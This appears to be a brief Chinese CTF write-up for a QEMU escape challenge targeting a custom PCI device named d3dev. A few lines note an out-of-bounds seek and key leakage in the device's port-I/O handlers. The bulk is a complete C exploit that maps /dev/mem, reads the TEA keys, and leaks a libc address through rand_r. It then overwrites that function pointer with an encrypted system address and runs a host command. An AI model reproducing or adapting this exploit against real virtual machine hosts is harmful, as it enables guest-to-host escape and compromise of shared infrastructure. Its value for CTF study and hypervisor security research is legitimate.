绿
设备叫d3dev
两个id
一个mmio 一个pmio
结构体
看起来像tea
#define DELTA 0x9e3779b9
void tea_encrypt(unsigned int* v, unsigned int* key) {
unsigned int l = v[0], r = v[1], sum = 0;
for (size_t i = 0; i < 32; i++) { //进行32次迭代加密,Tea算法作者的建议迭代次数
l += (((r << 4) ^ (r >> 5)) + r) ^ (sum + key[sum & 3]);
sum += DELTA; //累加Delta的值
r += (((l << 4) ^ (l >> 5)) + l) ^ (sum + key[(sum >> 11) & 3]); //利用多次双位移和异或将明文与密钥扩散混乱,并将两个明文互相加密
}
v[0] = l;
v[1] = r;
}
//利用可逆性将加密过程逆转
void tea_decrypt(unsigned int* v, unsigned int* key) {
unsigned int l = v[0], r = v[1], sum = 0;
sum = DELTA * 32; //32次迭代累加后delta的值
for (size_t i = 0; i < 32; i++) {
r -= (((l << 4) ^ (l >> 5)) + l) ^ (sum + key[(sum >> 11) & 3]);
sum -= DELTA;
l -= (((r << 4) ^ (r >> 5)) + r) ^ (sum + key[sum & 3]);
}
v[0] = l;
v[1] = r;
}
所以看起来它干的事情就是用tea算法解密指定位置上的内容。
mmio_write
也有tea
看起来就是把指定位置的数拿出来tea加密一下再写回去
pmio_read
看起来比较玄乎
看一下汇编就会比较清晰
简答说就是我们可以把四个key读出来。
pmio_write
可以设置seek来导致越界
可以执行rand_r函数
思路还是比较简单的
就是利用越界读写,读出rand_r的地址,从而拿到libc,然后再把system写进去
就可以了
exp
#include <stdio.h>
#include <unistd.h>
#include <stdint.h>
#include <fcntl.h>
#include <sys/types.h>
#include <sys/mman.h>
#include <sys/io.h>
#include <sys/ioctl.h>
#include <sys/io.h>
#define _DWORD uint32_t
#define LODWORD(x) (*((_DWORD *)&(x)))
//cat /sys/devices/pci0000\:00/0000\:00\:03.0/resource0
uint32_t mmio_addr = 0xfebf1000;
uint32_t mmio_size = 0x800;
size_t port_addr = 0xc040;
u_int32_t key[4];
unsigned char* mmio_mem;
void die(const char* msg)
{
perror(msg);
exit(-1);
}
void* mem_map( const char* dev, size_t offset, size_t size )
{
int fd = open( dev, O_RDWR | O_SYNC );
if ( fd == -1 ) {
return 0;
}
void* result = mmap( NULL, size, PROT_READ | PROT_WRITE, MAP_SHARED, fd, offset );
if ( !result ) {
return 0;
}
close( fd );
return result;
}
uint64_t mmio_read(uint64_t addr)
{
return *((uint8_t*) (mmio_mem+addr));
}
void mmio_write(uint64_t addr, uint64_t value)
{
*( (uint64_t *) (mmio_mem+addr) ) = value;
}
void pmio_write(size_t port, u_int32_t val)
{
outl(val, port_addr + port);
}
size_t pmio_read(size_t port)
{
return inl(port_addr + port);
}
size_t tea(size_t m)
{
uint64_t v3;
signed int v4; // esi
unsigned int v5; // ecx
uint64_t result; // rax
v3 = m;
v4 = -957401312;
v5 = v3;
result = v3 >> 32;
do
{
LODWORD(result) = result - ((v5 + v4) ^ (key[3] + (v5 >> 5)) ^ (key[2] + 16 * v5));
v5 -= (result + v4) ^ (key[1] + ((unsigned int)result >> 5)) ^ (key[0] + 16 * result);
v4 += 1640531527;
} while (v4);
printf("0x%lx\n", v5);
printf("0x%lx\n", result);
return result << 32 | (u_int64_t)v5;
}
int main()
{
system( "mknod -m 660 /dev/mem c 1 1" );
mmio_mem = mem_map( "/dev/mem", mmio_addr, mmio_size );
if ( !mmio_mem ) {
die("mmap mmio failed");
}
if (iopl(3) != 0)
{
puts("iopl fail!");
exit(-1);
}
pmio_write(8, 0x100);
mmio_write(8, 0);
mmio_write(0x18, 0);
u_int32_t tmp;
u_int64_t rand_addr;
u_int64_t libc_base, system_addr;
rand_addr = mmio_read(0x18);
rand_addr += ((u_int64_t)mmio_read(0x18)) << 32;
libc_base = rand_addr - 0x59630;
system_addr = libc_base + 0x76890;
printf("libc 0x%llx\n", libc_base);
key[0] = pmio_read(12);
key[1] = pmio_read(16);
key[2] = pmio_read(20);
key[3] = pmio_read(24);
u_int64_t t = tea(system_addr);
mmio_write(0x18, t & 0xffffffff);
mmio_write(0x18, t >> 32);
char *payload = "cat flag";
tmp = tmp = *((u_int32_t *)payload + 1);
pmio_write(8, 0);
mmio_write(0, tmp);
tmp = *(u_int32_t *)payload;
printf("0x%lx", tmp);
pmio_write(28, tmp);
return 0;
}